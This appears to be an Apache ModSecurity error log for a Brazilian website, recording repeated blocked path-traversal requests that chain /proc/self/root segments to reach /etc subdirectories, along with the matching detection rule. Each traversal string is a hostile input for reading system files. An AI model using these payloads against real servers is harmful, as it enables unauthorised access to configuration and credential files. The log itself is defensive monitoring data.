[unique_id "abqeMfu8EFLIOrSqIpv6fAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:35.071552 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:54280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeM-w_le52K8_3pV3VIQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:35.657705 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:39042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeM0zinOy1jxa1j4cJ7wAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:36.943158 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:39058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeNEzinOy1jxa1j4cJ8QAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:37.971611 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:40482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeNeyqAr6etmhZHNq09AAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:38.303574 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:39062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeNta6ubjKNq_cu4aOlgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:40.213372 2026] [mime_magic:error] [pid 19507:tid 140411733534464] (70014)End of file found: [client 57.141.18.49:54270] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:44:40.627914 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:51746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeOAkwaGbbGflqUZAFrAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:40.699882 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:39766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeOAkwaGbbGflqUZAFrQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:44.531852 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:39774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqePOw_le52K8_3pV3VMQAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:46.903627 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:39778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqePvu8EFLIOrSqIpv6hQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:48.307070 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:39788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeQOyqAr6etmhZHNq0_AAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:49.127469 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:51760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeQda6ubjKNq_cu4aOoAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:44:49.682497 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.243.128:58114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeQSmAPhZkrhU8w4liqAAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:52.103323 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:58128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeRNY0UrI5A3LftIyaQgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:53.664324 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:58132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeReyqAr6etmhZHNq0_QAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:56.157080 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:58140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeRimAPhZkrhU8w4liqgAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:44:57.831111 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:58142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeScdf6f5d65gmYZTKXgAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:45:05.764187 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:58158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeUeoXxyEfFpUF8f9j_wAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:45:07.370418 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:42796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeU-w_le52K8_3pV3VOQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:45:08.696277 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:42804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeVAkwaGbbGflqUZAFuAAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:45:19.405474 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:43962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeX-w_le52K8_3pV3VRgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:45:23.148715 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:42954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqeYuyqAr6etmhZHNq1EAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
